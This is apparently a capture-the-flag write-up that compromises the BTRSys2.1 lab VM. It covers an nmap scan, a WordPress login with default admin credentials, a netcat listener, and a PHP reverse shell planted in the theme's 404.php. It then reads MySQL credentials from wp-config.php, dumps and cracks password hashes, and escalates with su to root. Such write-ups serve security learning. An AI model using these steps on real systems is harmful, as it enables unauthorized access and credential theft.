BTRSys2.1
nmap
(base) [psdon@arch BTRSys2.1]$ mkdir nmap
(base) [psdon@arch BTRSys2.1]$ sudo rustscan -a 192.168.208.50 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan# Nmap 7.92 scan initiated Thu Aug 26 20:10:30 2021 as: nmap -vvv -p 21,22,80 -T4 -A -oA nmap/all-ports-service-scan 192.168.208.50
Nmap scan report for 192.168.208.50 (192.168.208.50)
Host is up, received echo-reply ttl 63 (0.23s latency).
Scanned at 2021-08-26 20:10:30 PST for 21s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.208
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 08:ee:e3:ff:31:20:87:6c:12:e7:1c:aa:c4:e7:54:f2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKrYYWK3Xv2EBb0KryPAargHdeVdVuGj+AHTUbH1CyLIuQ3zbtaq2+lr5K/aMqiJ5othz27+RWSJ2NmQ2JeOUBCogFLikCwU6MRDQLHpV+neS3fAKrH5fNnXo+RfnMWBLQaaXBPiUOQaoQc27hRN3SJ1hbVLEF65TY0siTrOj0Lt8SRztwkbfynHEKxMsQi5WWDLTgS7bivCf9VVWwqgmuBbsJAqFExDjLxlxJpH4+93bgEtD9EPV/KKO9B3Inaz8PxC+zXZofhZXloysYoGg4IZzT55JzrRVRuv/cbGcMuGTBpCCkdH01G4NCSgL7YwX13C1Qc+EFX1QExV6k1ePD
| 256 ad:e1:1c:7d:e7:86:76:be:9a:a8:bd:b9:68:92:77:87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFTsqff4O0hsl+RUR2lXFcbCEkvFcspHALA2RR2DpoD2AlRN/DEpIbW3NETNXxxyKHTtGhUiBSUuw8S9RSBAsnY=
| 256 0c:e1:eb:06:0c:5c:b5:cc:1b:d1:fa:56:06:22:31:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH91w++CdkbeAkmXYietVhD/73nEaXR/nbeBEyuwLwgq
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONSPort 80 is open, let's check /robots.txt
WordPress
You can see robots.txt contains an interesting directory, called /wordpress . Let's see if we can log in using the default credentials. Let's try to login using admin as username and password.
Looks like we were able to log in using that credentials.
Initial Foothold
To get a reverse shell, set a netcat listener first.
(base) [psdon@arch BTRSys2.1]$ sudo nc -lvnp 80Then go to theme editor, and let's set the payload
Find a file you want to overwrite with your PHP reverse shell payload. In my case, I will be going to use the 404.php file.
Edit the file, paste your payload and save. You can use this PHP reverse shell payload, but you can use whatever you prefer.
Visit /wordpress/wp-content/themes/twentyfourteen/404.php and you should have received your shell in your terminal
Post Exploitation
Let's check the wp-config.php
www-data@ubuntu:/var/www/html/wordpress$ less wp-config.php
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information
* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost'); There's a MySQL credential on the file, let's try to log in using root as username and rootpassword! as password.
www-data@ubuntu:/var/www/.ssh$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 64
Server version: 5.7.17-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> I found credentials inside wordpress database.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| deneme |
| mysql |
| performance_schema |
| phpmyadmin |
| sys |
| wordpress |
+--------------------+
7 rows in set (0.01 sec)
mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------------+
| Tables_in_wordpress |
+----------------------------+
| wp_abtest_experiments |
| wp_abtest_goal_hits |
| wp_abtest_goals |
| wp_abtest_ip_filters |
| wp_abtest_variation_views |
| wp_abtest_variations |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_masta_campaign |
| wp_masta_cronapi |
| wp_masta_list |
| wp_masta_reports |
| wp_masta_responder |
| wp_masta_responder_reports |
| wp_masta_settings |
| wp_masta_subscribers |
| wp_masta_support |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+----------------------------+
26 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | root | a318e4507e5a74604aafb45e4741edd3 | btrisk | mdemir@btrisk.com | | 2017-04-24 17:37:04 | | 0 | btrisk |
| 2 | admin | 21232f297a57a5a743894a0e4a801fc3 | admin | ikaya@btrisk.com | | 2017-04-24 17:37:04 | | 4 | admin |
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
2 rows in set (0.01 sec)I have cracked the hashed user_pass of the root user using crackingstation.net
The password we have cracked is roottoor
Privilege Escalation
Let's try to login as root using the credentials we have cracked above.
www-data@ubuntu:/var/www/.ssh$ su
Password: roottoor
root@ubuntu:/var/www/.ssh# You are now root!
Last updated
Was this helpful?
